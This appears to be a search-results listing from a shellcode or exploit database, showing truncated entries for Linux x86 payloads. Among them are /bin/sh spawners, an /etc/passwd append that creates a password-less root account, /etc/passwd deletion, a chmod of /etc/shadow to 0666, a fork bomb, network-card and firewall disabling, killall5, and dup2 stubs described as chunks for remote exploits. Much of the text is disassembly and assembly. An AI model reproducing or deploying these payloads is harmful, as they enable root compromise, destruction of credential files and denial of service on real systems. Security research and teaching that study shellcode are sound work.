577 matches found
Linux x86 - /bin/sh 8 bytes
Linux x86 - /bin/sh 8 bytes. Shellcode exploit for linx86 platform / 08048334 : 8048334: 99 cltd 8048335: 6a 0b push $0xb 8048337: 58 pop %eax 8048338: 60 pusha 8048339: 59 pop %ecx 804833a: cd 80 int $0x80 using this code. step1. This code is compiled. step2. strace -x output binary step3. get...
Linux x86 - polymorphic shellcode ip6tables -F - 71 bytes
Linux x86 - polymorphic shellcode ip6tables -F - 71 bytes. Shellcode exploit for linx86 platform / Linux x86 - polymorphic shellcode ip6tables -F - 71 bytes Jonathan Salwan ! DataBase of Shellcodes and you can share your shellcodes : http://www.shell-storm.org/shellcode/ ! The Gnuser Project Gnu...
linux/x86 dup2(0 0)
No description provided by source. / dup2loop-core.c by Charles Stevenson [email protected] I made this as a chunk you can paste in to make modular remote exploits. I usually combine this with an execve as the second stage of a read jmp %esp / char hellcode = / dup20,0; dup20,1; dup20,2; linux/x86 ...
linux/x86 _exit(1)
No description provided by source. / exit-core.c by Charles Stevenson [email protected] I made this as a chunk you can paste in to make modular remote exploits. I use it when I need a process to exit cleanly. / char hellcode = / exit1; linux/x86 by core / // 7 bytes exit1 ... 'cause we're nice : by...
linux/x86 read(0 buf 2541)
No description provided by source. / readnchmod-core.c by Charles Stevenson [email protected] Example of strace output if you pass in "/bin/sh\x00" read0, "/bin/sh\0", 2541 = 8 chmod"/bin/sh", 04755 = 0 Any file path can be given. For example: /tmp/.sneakyguy The only caveat is that the string must...
linux/x86 if(read(fd buf 512)<=2) _exit(1) else buf()
No description provided by source. / h3ll-core.c by Charles Stevenson [email protected] I made this as a chunk you can paste in to make modular remote exploits. I use it as a first stage payload when I desire to follow up with a real large payload of goodness. This actually is a bit larger than...
linux/x86 eject /dev/cdrom 42 bytes
linux/x86 eject /dev/cdrom 42 bytes. Shellcode exploit for linx86 platform ; linux/x86 eject /dev/cdrom 42 bytes ; root@thegibson ; 2010-01-08 section .text global start start: ; open"/dev/cdrom", ORDONLY | ONONBLOCK; mov al, 5 cdq push edx push word 0x6d6f push dword 0x7264632f push dword...
linux/x86 append "/etc/passwd" & exit 107 bytes
linux/x86 append "/etc/passwd" & exit 107 bytes. Shellcode exploit for linx86 platform / appendpasswd.c Payload: Adds the string: toor::0:0:t00r:/root:/bin/bash to /etc/passwd thereby adding a password-less root account with login name "toor" Platform: linux/x86 Size: 107 bytes Author: $andman / ...
linux/x86 fork bomb 6 bytes
Exploit for linux/x86 platform in category shellcode =========================== linux/x86 fork bomb 6 bytes =========================== Smallest fork bomb shellcode I could make. ; linux/x86 fork bomb 6 bytes ; email protected ; 2009-12-30 section .text global start start: ; fork mov al, 2 int...
linux/x86 unlink(/etc/passwd) & exit() 35 bytes
No description provided by source. Title: linux/x86 unlink/etc/passwd & exit 35 bytes Date: 2009-12-24 Author: sandman, n4mdn4s 4T gmail D0T com Tested on: linux/Fedora 12 Code : / unlinkpasswd.c Platform: linux/x86 Size: 35 bytes Author: $andman / include string.h include stdio.h char shell =...
linux/x86 break chroot 87 bytes
No description provided by source. bt:/ ./pwn perl -e 'print "\x90"x181...
linux/x86 unlink(/etc/passwd) & exit() 35 bytes
Exploit for linux/x86 platform in category shellcode =============================================== linux/x86 unlink/etc/passwd & exit 35 bytes =============================================== Title: linux/x86 unlink/etc/passwd & exit 35 bytes Date: 2009-12-24 Author: sandman Tested on:...
linux/x86 execve() - 51bytes
Exploit for linux/x86 platform in category shellcode ============================ linux/x86 execve - 51bytes ============================ / linux/x86 execve51bytes 08048080 : 8048080: eb 1a jmp 804809c 08048082 : 8048082: 5e pop %esi 8048083: 31 c0 xor %eax,%eax 8048085: 88 46 07 mov %al,0x7%esi...
linux/x86 setuid(0) & execve("/sbin/poweroff -f") 47 bytes
Exploit for linux/x86 platform in category shellcode ========================================================== linux/x86 setuid0 & execve"/sbin/poweroff -f" 47 bytes ========================================================== include / linux/x86 ; setuid0 & execve"/sbin/poweroff -f" 47 bytes...
linux/x86 chmod(/etc/shadow, 0666) & exit() 33 bytes
Exploit for linux/x86 platform in category shellcode ==================================================== linux/x86 chmod/etc/shadow, 0666 & exit 33 bytes ==================================================== include / linux/x86 ; chmod/etc/shadow, 0666 & exit 33 bytes written by ka0x lun sep 21...
Dialysis hacking techniques of penetration of the firewall to the Shellcode-exploit warning-the black bar safety net
Summary 1. Remote shellcode several ways 2. Reuse the current connection technology of some of the issues and advantages 3. Win32 platform-specific implementation 4. Linux x86 platform specific implementation 5. AIX PowerPC platform-specific implementation Implementation introduction 1...
linux/x86 Polymorphic shellcode disable Network Card 75 bytes
Exploit for linux/x86 platform in category shellcode ============================================================= linux/x86 Polymorphic shellcode disable Network Card 75 bytes ============================================================= / Linux x86 - Polymorphic shellcode for disable Network Ca...
linux/x86 - Polymorphic shellcode disable Network Card 75 bytes
linux/x86 Polymorphic shellcode disable Network Card 75 bytes. Shellcode exploit for linx86 platform / Linux x86 - Polymorphic shellcode for disable Network Card default eth0 - 75 bytes Jonathan Salwan ! DataBase of Shellcodes and you can share your shellcodes :...
linux/x86 /bin/sh polymorphic shellcode 48 bytes
No description provided by source. / Title: Polymorphic Shellcode /bin/sh - 48 bytes Author: Jonathan Salwan Mail: submit ! shell-storm.org ! DataBase of shellcode : http://www.shell-storm.org/shellcode/ Original Informations ===================== Disassembly of section .text: 08048060 .text:...
linux/x86 - killall5 polymorphic shellcode 61 bytes
linux/x86 killall5 polymorphic shellcode 61 bytes. Shellcode exploit for linx86 platform / Title: Linux x86 | Polymorphic Shellcode killall5 - 61 bytes Author: Jonathan Salwan Mail: submit ! shell-storm.org ! DataBase of shellcode == http://www.shell-storm.org/shellcode/ killall5 is the SystemV...